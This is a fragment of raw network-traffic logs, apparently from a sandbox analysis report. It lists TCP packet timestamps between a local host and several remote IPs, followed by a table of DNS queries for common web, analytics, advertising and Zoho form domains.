                                                                                                                                                                                              Nov 20, 2024 21:28:31.535131931 CET44349860141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:31.542915106 CET44349860141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:31.542969942 CET44349860141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:31.542979002 CET49860443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:31.542985916 CET44349860141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:31.543020964 CET49860443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:31.551415920 CET44349860141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:31.554446936 CET49850443192.168.2.5192.229.233.34
                                                                                                                                                                                              Nov 20, 2024 21:28:31.560497999 CET44349860141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:31.560724020 CET49860443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:31.560731888 CET44349860141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:31.577428102 CET49873443192.168.2.566.102.1.155
                                                                                                                                                                                              Nov 20, 2024 21:28:31.577445030 CET4434987366.102.1.155192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:31.577518940 CET49873443192.168.2.566.102.1.155
                                                                                                                                                                                              Nov 20, 2024 21:28:31.577831984 CET49873443192.168.2.566.102.1.155
                                                                                                                                                                                              Nov 20, 2024 21:28:31.577847004 CET4434987366.102.1.155192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:31.591136932 CET44349858172.67.11.155192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:31.593494892 CET44349858172.67.11.155192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:31.593564034 CET49858443192.168.2.5172.67.11.155
                                                                                                                                                                                              Nov 20, 2024 21:28:31.593574047 CET44349858172.67.11.155192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:31.598218918 CET44349858172.67.11.155192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:31.598277092 CET49858443192.168.2.5172.67.11.155
                                                                                                                                                                                              Nov 20, 2024 21:28:31.598284960 CET44349858172.67.11.155192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:31.603492022 CET44349858172.67.11.155192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:31.603588104 CET49858443192.168.2.5172.67.11.155
                                                                                                                                                                                              Nov 20, 2024 21:28:31.603595972 CET44349858172.67.11.155192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:31.605051994 CET44349863141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:31.608989954 CET49860443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:31.609000921 CET44349860141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:31.612159967 CET44349858172.67.11.155192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:31.612237930 CET49858443192.168.2.5172.67.11.155
                                                                                                                                                                                              Nov 20, 2024 21:28:31.612246037 CET44349858172.67.11.155192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:31.612348080 CET49858443192.168.2.5172.67.11.155
                                                                                                                                                                                              Nov 20, 2024 21:28:31.613105059 CET49863443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:31.613111973 CET44349863141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:31.613571882 CET44349863141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:31.614351034 CET49863443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:31.614424944 CET44349863141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:31.614526987 CET49863443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:31.614553928 CET44349863141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:31.616565943 CET44349858172.67.11.155192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:31.616586924 CET44349858172.67.11.155192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:31.616621017 CET49858443192.168.2.5172.67.11.155
                                                                                                                                                                                              Nov 20, 2024 21:28:31.629534006 CET44349858172.67.11.155192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:31.629544973 CET44349858172.67.11.155192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:31.629601002 CET49858443192.168.2.5172.67.11.155
                                                                                                                                                                                              Nov 20, 2024 21:28:31.629610062 CET44349858172.67.11.155192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:31.634143114 CET44349858172.67.11.155192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:31.634197950 CET49858443192.168.2.5172.67.11.155
                                                                                                                                                                                              Nov 20, 2024 21:28:31.634207010 CET44349858172.67.11.155192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:31.634337902 CET49858443192.168.2.5172.67.11.155
                                                                                                                                                                                              Nov 20, 2024 21:28:31.642982960 CET44349858172.67.11.155192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:31.642995119 CET44349858172.67.11.155192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:31.643065929 CET49858443192.168.2.5172.67.11.155
                                                                                                                                                                                              Nov 20, 2024 21:28:31.651669025 CET44349858172.67.11.155192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:31.651736975 CET49858443192.168.2.5172.67.11.155
                                                                                                                                                                                              Nov 20, 2024 21:28:31.657799959 CET49860443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:31.660042048 CET44349858172.67.11.155192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:31.660099030 CET49858443192.168.2.5172.67.11.155
                                                                                                                                                                                              Nov 20, 2024 21:28:31.661708117 CET44349850192.229.233.34192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:31.661720991 CET44349850192.229.233.34192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:31.661737919 CET44349850192.229.233.34192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:31.661751032 CET44349850192.229.233.34192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:31.661757946 CET44349850192.229.233.34192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:31.661772966 CET44349850192.229.233.34192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:31.661786079 CET49850443192.168.2.5192.229.233.34
                                                                                                                                                                                              Nov 20, 2024 21:28:31.661835909 CET49850443192.168.2.5192.229.233.34
                                                                                                                                                                                              Nov 20, 2024 21:28:31.661850929 CET44349850192.229.233.34192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:31.662103891 CET49850443192.168.2.5192.229.233.34
                                                                                                                                                                                              Nov 20, 2024 21:28:31.664422035 CET44349858172.67.11.155192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:31.664513111 CET49858443192.168.2.5172.67.11.155
                                                                                                                                                                                              Nov 20, 2024 21:28:31.671560049 CET44349860141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:31.673466921 CET44349858172.67.11.155192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:31.673526049 CET49858443192.168.2.5172.67.11.155
                                                                                                                                                                                              Nov 20, 2024 21:28:31.673791885 CET44349860141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:31.673850060 CET49860443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:31.673857927 CET44349860141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:31.677515030 CET44349858172.67.11.155192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:31.677592993 CET49858443192.168.2.5172.67.11.155
                                                                                                                                                                                              Nov 20, 2024 21:28:31.678973913 CET44349860141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:31.679022074 CET49860443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:31.679028988 CET44349860141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:31.683909893 CET44349860141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:31.683986902 CET49860443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:31.683994055 CET44349860141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:31.686239004 CET44349858172.67.11.155192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:31.686296940 CET49858443192.168.2.5172.67.11.155
                                                                                                                                                                                              Nov 20, 2024 21:28:31.694814920 CET44349860141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:31.694861889 CET44349860141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:31.694873095 CET49860443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:31.694883108 CET44349860141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:31.694936037 CET49860443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:31.695669889 CET44349858172.67.11.155192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:31.696099997 CET49858443192.168.2.5172.67.11.155
                                                                                                                                                                                              Nov 20, 2024 21:28:31.699954033 CET44349850192.229.233.34192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:31.700004101 CET44349850192.229.233.34192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:31.700041056 CET49850443192.168.2.5192.229.233.34
                                                                                                                                                                                              Nov 20, 2024 21:28:31.700050116 CET44349850192.229.233.34192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:31.700098991 CET49850443192.168.2.5192.229.233.34
                                                                                                                                                                                              Nov 20, 2024 21:28:31.701395035 CET44349858172.67.11.155192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:31.701452971 CET49858443192.168.2.5172.67.11.155
                                                                                                                                                                                              Nov 20, 2024 21:28:31.703569889 CET44349860141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:31.703583956 CET44349860141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:31.703646898 CET49860443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:31.713526964 CET44349860141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:31.713538885 CET44349860141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:31.713593960 CET49860443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:31.713601112 CET44349860141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:31.723267078 CET44349860141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:31.723331928 CET49860443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:31.723340988 CET44349860141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:31.723388910 CET49860443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:31.727895021 CET44349860141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:31.727902889 CET44349860141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:31.727950096 CET49860443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:31.737932920 CET44349860141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:31.737941980 CET44349860141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:31.737987995 CET49860443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:31.742520094 CET44349860141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:31.742615938 CET44349860141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:31.742690086 CET49860443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:31.742796898 CET49860443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:31.742809057 CET44349860141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:31.794560909 CET44349858172.67.11.155192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:31.794641972 CET49858443192.168.2.5172.67.11.155
                                                                                                                                                                                              Nov 20, 2024 21:28:31.801896095 CET44349858172.67.11.155192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:31.801954985 CET49858443192.168.2.5172.67.11.155
                                                                                                                                                                                              Nov 20, 2024 21:28:31.804946899 CET44349858172.67.11.155192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:31.805038929 CET49858443192.168.2.5172.67.11.155
                                                                                                                                                                                              Nov 20, 2024 21:28:31.811268091 CET44349858172.67.11.155192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:31.811342001 CET49858443192.168.2.5172.67.11.155
                                                                                                                                                                                              Nov 20, 2024 21:28:31.814393997 CET44349858172.67.11.155192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:31.814461946 CET49858443192.168.2.5172.67.11.155
                                                                                                                                                                                              Nov 20, 2024 21:28:31.820049047 CET44349850192.229.233.34192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:31.820126057 CET49850443192.168.2.5192.229.233.34
                                                                                                                                                                                              Nov 20, 2024 21:28:31.820137024 CET44349850192.229.233.34192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:31.820235014 CET44349850192.229.233.34192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:31.820291042 CET49850443192.168.2.5192.229.233.34
                                                                                                                                                                                              Nov 20, 2024 21:28:31.820575953 CET44349858172.67.11.155192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:31.820631981 CET49858443192.168.2.5172.67.11.155
                                                                                                                                                                                              Nov 20, 2024 21:28:31.822194099 CET49850443192.168.2.5192.229.233.34
                                                                                                                                                                                              Nov 20, 2024 21:28:31.822204113 CET44349850192.229.233.34192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:31.826510906 CET44349858172.67.11.155192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:31.826594114 CET49858443192.168.2.5172.67.11.155
                                                                                                                                                                                              Nov 20, 2024 21:28:31.832344055 CET44349858172.67.11.155192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:31.832401037 CET49858443192.168.2.5172.67.11.155
                                                                                                                                                                                              Nov 20, 2024 21:28:31.835339069 CET44349858172.67.11.155192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:31.835392952 CET49858443192.168.2.5172.67.11.155
                                                                                                                                                                                              Nov 20, 2024 21:28:31.840337038 CET49877443192.168.2.5192.229.233.34
                                                                                                                                                                                              Nov 20, 2024 21:28:31.840358973 CET44349877192.229.233.34192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:31.840419054 CET49877443192.168.2.5192.229.233.34
                                                                                                                                                                                              Nov 20, 2024 21:28:31.840636969 CET49877443192.168.2.5192.229.233.34
                                                                                                                                                                                              Nov 20, 2024 21:28:31.840650082 CET44349877192.229.233.34192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:31.841141939 CET44349858172.67.11.155192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:31.841217041 CET49858443192.168.2.5172.67.11.155
                                                                                                                                                                                              Nov 20, 2024 21:28:31.843319893 CET49878443192.168.2.5192.229.233.34
                                                                                                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                              Nov 20, 2024 21:28:11.095582008 CET192.168.2.51.1.1.10xa244Standard query (0)ambir.comA (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:11.095820904 CET192.168.2.51.1.1.10x125fStandard query (0)ambir.com65IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:13.451420069 CET192.168.2.51.1.1.10xd27cStandard query (0)platform-api.sharethis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:13.451694965 CET192.168.2.51.1.1.10x980fStandard query (0)platform-api.sharethis.com65IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:13.469182014 CET192.168.2.51.1.1.10x6d5cStandard query (0)maxcdn.bootstrapcdn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:13.469363928 CET192.168.2.51.1.1.10x72d0Standard query (0)maxcdn.bootstrapcdn.com65IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:13.930635929 CET192.168.2.51.1.1.10x5e6eStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:13.931005001 CET192.168.2.51.1.1.10xb5dStandard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:15.870587111 CET192.168.2.51.1.1.10x5fc6Standard query (0)maxcdn.bootstrapcdn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:15.870842934 CET192.168.2.51.1.1.10x7fe4Standard query (0)maxcdn.bootstrapcdn.com65IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:18.324796915 CET192.168.2.51.1.1.10x3551Standard query (0)nyciot.comA (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:18.324954987 CET192.168.2.51.1.1.10xd1d6Standard query (0)nyciot.com65IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:18.325423002 CET192.168.2.51.1.1.10x9d9bStandard query (0)forms.zohopublic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:18.325578928 CET192.168.2.51.1.1.10x743Standard query (0)forms.zohopublic.com65IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:18.657088995 CET192.168.2.51.1.1.10x7ebcStandard query (0)ambir.comA (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:18.657278061 CET192.168.2.51.1.1.10x87edStandard query (0)ambir.com65IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:20.968262911 CET192.168.2.51.1.1.10x6678Standard query (0)static.zohocdn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:20.968455076 CET192.168.2.51.1.1.10xe334Standard query (0)static.zohocdn.com65IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:21.553026915 CET192.168.2.51.1.1.10xc984Standard query (0)s.adroll.comA (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:21.553170919 CET192.168.2.51.1.1.10xad06Standard query (0)s.adroll.com65IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:21.743877888 CET192.168.2.51.1.1.10x43f9Standard query (0)www.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:21.744261980 CET192.168.2.51.1.1.10x6e96Standard query (0)www.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:21.747229099 CET192.168.2.51.1.1.10x9225Standard query (0)nyciot.comA (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:21.747476101 CET192.168.2.51.1.1.10x4512Standard query (0)nyciot.com65IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:22.072650909 CET192.168.2.51.1.1.10x732fStandard query (0)analytics.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:22.073091030 CET192.168.2.51.1.1.10x6775Standard query (0)analytics.google.com65IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:22.107259989 CET192.168.2.51.1.1.10xf4d6Standard query (0)td.doubleclick.netA (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:22.107686043 CET192.168.2.51.1.1.10x71fdStandard query (0)td.doubleclick.net65IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:23.671250105 CET192.168.2.51.1.1.10x2718Standard query (0)www.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:23.671422005 CET192.168.2.51.1.1.10xa8fStandard query (0)www.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:24.145050049 CET192.168.2.51.1.1.10x6eaaStandard query (0)accounts.zoho.comA (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:24.145235062 CET192.168.2.51.1.1.10x737cStandard query (0)accounts.zoho.com65IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:24.963628054 CET192.168.2.51.1.1.10xeb2dStandard query (0)sdks.shopifycdn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:24.963820934 CET192.168.2.51.1.1.10x3beaStandard query (0)sdks.shopifycdn.com65IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:25.051212072 CET192.168.2.51.1.1.10x6939Standard query (0)webfonts.zohowebstatic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:25.051212072 CET192.168.2.51.1.1.10xd597Standard query (0)webfonts.zohowebstatic.com65IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:25.478144884 CET192.168.2.51.1.1.10x3099Standard query (0)acsbapp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:25.478322983 CET192.168.2.51.1.1.10x6a88Standard query (0)acsbapp.com65IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:25.479105949 CET192.168.2.51.1.1.10x20daStandard query (0)googleads.g.doubleclick.netA (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:25.479305029 CET192.168.2.51.1.1.10x4fa7Standard query (0)googleads.g.doubleclick.net65IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:26.029582024 CET192.168.2.51.1.1.10x832Standard query (0)static.olark.comA (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:26.029871941 CET192.168.2.51.1.1.10x3a72Standard query (0)static.olark.com65IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:26.312835932 CET192.168.2.51.1.1.10x96c7Standard query (0)s.adroll.comA (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:26.312999010 CET192.168.2.51.1.1.10x7c8fStandard query (0)s.adroll.com65IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:26.345629930 CET192.168.2.51.1.1.10x12daStandard query (0)accounts.zoho.comA (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:26.345773935 CET192.168.2.51.1.1.10x2511Standard query (0)accounts.zoho.com65IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:26.578161955 CET192.168.2.51.1.1.10xe8bdStandard query (0)static.zohocdn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:26.578424931 CET192.168.2.51.1.1.10xbfaStandard query (0)static.zohocdn.com65IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:27.640201092 CET192.168.2.51.1.1.10xc578Standard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:27.640409946 CET192.168.2.51.1.1.10x88b5Standard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:27.642220020 CET192.168.2.51.1.1.10x3959Standard query (0)use.fontawesome.comA (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:27.642576933 CET192.168.2.51.1.1.10x9865Standard query (0)use.fontawesome.com65IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:27.649450064 CET192.168.2.51.1.1.10xada0Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:27.649749041 CET192.168.2.51.1.1.10x1d60Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:28.049755096 CET192.168.2.51.1.1.10x5fe6Standard query (0)sdks.shopifycdn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:28.050060034 CET192.168.2.51.1.1.10x3a13Standard query (0)sdks.shopifycdn.com65IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:29.279304028 CET192.168.2.51.1.1.10xa406Standard query (0)googleads.g.doubleclick.netA (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:29.279681921 CET192.168.2.51.1.1.10x901bStandard query (0)googleads.g.doubleclick.net65IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:29.282111883 CET192.168.2.51.1.1.10x4ec4Standard query (0)acsbapp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:29.282414913 CET192.168.2.51.1.1.10x4470Standard query (0)acsbapp.com65IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:29.286238909 CET192.168.2.51.1.1.10xece9Standard query (0)static.olark.comA (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:29.286396027 CET192.168.2.51.1.1.10x386Standard query (0)static.olark.com65IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:30.291824102 CET192.168.2.51.1.1.10xc451Standard query (0)d.adroll.comA (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:30.291970015 CET192.168.2.51.1.1.10x6ca5Standard query (0)d.adroll.com65IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:30.437203884 CET192.168.2.51.1.1.10x4f68Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:30.437480927 CET192.168.2.51.1.1.10x35e8Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:31.438868999 CET192.168.2.51.1.1.10xfe44Standard query (0)stats.g.doubleclick.netA (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:31.439234018 CET192.168.2.51.1.1.10xcd2fStandard query (0)stats.g.doubleclick.net65IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:33.642914057 CET192.168.2.51.1.1.10x2b3dStandard query (0)x.adroll.comA (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:33.643193007 CET192.168.2.51.1.1.10xb4beStandard query (0)x.adroll.com65IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:33.643696070 CET192.168.2.51.1.1.10xbea1Standard query (0)connect.facebook.netA (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:33.644105911 CET192.168.2.51.1.1.10x187eStandard query (0)connect.facebook.net65IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:33.657105923 CET192.168.2.51.1.1.10x4a61Standard query (0)d.adroll.comA (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:33.657445908 CET192.168.2.51.1.1.10xd7dfStandard query (0)d.adroll.com65IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:34.195442915 CET192.168.2.51.1.1.10xf062Standard query (0)knrpc.olark.comA (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:34.195887089 CET192.168.2.51.1.1.10xe629Standard query (0)knrpc.olark.com65IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:36.311913013 CET192.168.2.51.1.1.10x3597Standard query (0)knrpc.olark.comA (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:36.312258005 CET192.168.2.51.1.1.10xc125Standard query (0)knrpc.olark.com65IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:36.937581062 CET192.168.2.51.1.1.10x2aeeStandard query (0)connect.facebook.netA (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:36.937741995 CET192.168.2.51.1.1.10x29ceStandard query (0)connect.facebook.net65IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:39.108644009 CET192.168.2.51.1.1.10xd842Standard query (0)static.olark.comA (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:39.108877897 CET192.168.2.51.1.1.10x87eaStandard query (0)static.olark.com65IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:39.173320055 CET192.168.2.51.1.1.10xa280Standard query (0)x.adroll.comA (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:39.173468113 CET192.168.2.51.1.1.10x5245Standard query (0)x.adroll.com65IN (0x0001)false
                                                                                                                                                                                              Nov 20, 2024 21:28:39.183403015 CET192.168.2.51.1.1.10xfea1Standard query (0)x.bidswitch.netA (IP address)IN (0x0001)false
